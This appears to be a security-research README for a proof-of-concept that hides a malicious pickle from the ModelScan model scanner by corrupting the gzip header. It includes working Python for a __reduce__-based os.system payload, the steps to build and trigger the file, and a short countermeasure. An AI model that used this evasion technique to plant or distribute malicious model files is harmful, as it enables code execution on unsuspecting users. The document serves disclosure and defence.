
ModelScan Bypass - Corrupt Compression Header

Security Research - ModelScan Bypass Technique

Overview

This repository contains a proof-of-concept demonstrating a bypass technique for ModelScan, a popular ML model security scanner. This technique allows malicious pickle-based model files to evade detection.

Technique

Malformed compression header

Gzip file with a corrupted header: the first byte of the gzip magic number (0x1f 0x8b) is overwritten with 0x00, so tools that rely on standard gzip decompression cannot read the archive.

File

  • exploit_corrupt_header.joblib.gz
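A minimal sketch of how such a file could be constructed (the class name and the benign `echo` payload are illustrative; the actual exploit file in this repository may differ in details):

```python
import gzip
import os
import pickle


class Exploit:
    """Pickle payload: unpickling invokes os.system with the given argument."""

    def __reduce__(self):
        return (os.system, ('echo "RCE executed!"',))


# Serialize the malicious object and gzip-compress it, as joblib would
blob = gzip.compress(pickle.dumps(Exploit()))

# Corrupt the gzip magic number (0x1f 0x8b) by zeroing the first byte
corrupted = b"\x00" + blob[1:]

with open("exploit_corrupt_header.joblib.gz", "wb") as f:
    f.write(corrupted)
```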

Reproduction Steps

Testing with ModelScan

# Install ModelScan
pip install modelscan

# Download the exploit file from this repository
# Then scan it
modelscan scan -p exploit_corrupt_header.joblib.gz

Expected Result

SKIPPED - Scanner did not analyze this file

Triggering the Exploit

import joblib

# WARNING: This will execute arbitrary code!
model = joblib.load('exploit_corrupt_header.joblib.gz')

Technical Details

This exploit uses Python's pickle __reduce__ method for RCE. Unpickling an object of a class like this invokes the returned callable with the given arguments:

import os

class Exploit:
    def __reduce__(self):
        # pickle serializes this as "call os.system(...)" on load
        return (os.system, ('echo "RCE executed!"',))

Why ModelScan misses this:

The scanner selects its handler based on the file's compression format. With the first magic byte zeroed, gzip decompression fails; instead of treating that failure as suspicious, the scanner marks the file as skipped, and the pickle payload inside is never inspected.
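The failure mode can be reproduced with the standard library alone: a single corrupted byte is enough to make ordinary gzip decompression raise, which is the point at which a scanner gives up (the payload here is a harmless stand-in, not the exploit):

```python
import gzip
import pickle

payload = pickle.dumps({"weights": [0.1, 0.2]})  # harmless stand-in for a model
blob = gzip.compress(payload)

corrupted = b"\x00" + blob[1:]  # zero out the first gzip magic byte

try:
    gzip.decompress(corrupted)
    print("decompressed")
except gzip.BadGzipFile as e:
    # Scanner-style decompression fails here, before any pickle inspection
    print("BadGzipFile:", e)
```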

Security Impact

Severity: HIGH

Attack Vector:

  1. Attacker creates malicious model using this technique
  2. Uploads to model hub (HuggingFace, etc.)
  3. Victim downloads and scans with ModelScan
  4. Scanner reports "No issues found!" or skips the file
  5. Victim loads model → RCE
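One defensive countermeasure (not part of this PoC, and no substitute for avoiding pickle-based formats): treat a file that fails to decompress as suspicious rather than skipping it, for example by checking that a `.gz` artifact actually starts with the gzip magic bytes before accepting it:

```python
GZIP_MAGIC = b"\x1f\x8b"


def looks_like_valid_gzip(path: str) -> bool:
    """Return False for files whose .gz name doesn't match real gzip magic bytes."""
    with open(path, "rb") as f:
        return f.read(2) == GZIP_MAGIC
```

A pipeline could quarantine any model file for which this check fails instead of passing it through unscanned.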
